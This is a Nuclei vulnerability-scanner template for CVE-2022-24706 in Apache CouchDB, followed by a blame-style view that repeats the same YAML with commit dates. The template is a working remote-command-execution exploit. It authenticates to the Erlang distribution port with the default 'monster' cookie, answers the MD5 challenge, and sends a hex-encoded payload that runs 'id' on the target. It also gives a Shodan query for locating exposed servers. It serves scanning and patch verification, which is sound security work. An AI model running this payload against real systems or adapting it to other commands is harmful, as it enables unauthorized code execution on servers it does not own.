nuclei-templates/network/cves/2022/CVE-2022-24706.yaml

id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
  metadata:
    max-request: 2
    shodan-query: product:"CouchDB"
    verified: "true"
  tags: cve,cve2022,network,couch,rce

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:9100"
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
minor -update 2023-04-24 20:49:06 +00:00			`id: CVE-2022-24706`
adding template 2023-04-16 16:32:56 +00:00
			`info:`
minor -update 2023-04-24 20:49:06 +00:00			`name: CouchDB Erlang Distribution - Remote Command Execution`
			`author: Mzack9999,pussycat0x`
adding template 2023-04-16 16:32:56 +00:00			`severity: critical`
minor -update 2023-04-24 20:49:06 +00:00			`description: \|`
			`In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.`
			`reference:`
			`- https://www.exploit-db.com/exploits/50914`
minor enhancement 2023-06-06 06:42:39 +00:00			`- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-24706`
minor -update 2023-04-24 20:49:06 +00:00			`metadata:`
TemplateMan Update [Wed Jun 21 21:03:53 UTC 2023] :robot: 2023-06-21 21:03:53 +00:00			`max-request: 2`
minor -update 2023-04-24 20:49:06 +00:00			`shodan-query: product:"CouchDB"`
TemplateMan Update [Wed Jun 21 21:03:53 UTC 2023] :robot: 2023-06-21 21:03:53 +00:00			`verified: "true"`
minor enhancement 2023-06-06 06:42:39 +00:00			`tags: cve,cve2022,network,couch,rce`
adding template 2023-04-16 16:32:56 +00:00
			`variables:`
data - update 2023-06-06 07:07:03 +00:00			`name_msg: "00156e00050007499c4141414141414041414141414141"`
adding template 2023-04-16 16:32:56 +00:00			`challenge_reply: "00157201020304"`
			`cookie: "monster"`
			`cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"`

Update CVE-2022-24706.yaml 2023-06-06 07:17:45 +00:00			`tcp:`
adding template 2023-04-16 16:32:56 +00:00			`- inputs:`
			`# auth`
			`- data: "{{name_msg}}"`
			`type: hex`
			`read: 1024`
			`- read: 1024`
			`name: challenge`
			`- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"`
			`type: hex`
			`# rce`
			`- data: "{{cmd}}"`
			`type: hex`
			`read: 1024`
			`host:`
Update CVE-2022-24706.yaml 2023-06-14 11:40:06 +00:00			`- "{{Hostname}}"`
data - update 2023-06-06 07:07:03 +00:00			`- "{{Host}}:9100"`
adding template 2023-04-16 16:32:56 +00:00			`matchers:`
			`- type: word`
			`part: raw`
			`words:`
			`- "uid"`
			`- "gid"`
			`- "groups"`
minor -update 2023-04-24 20:49:06 +00:00			`condition: and`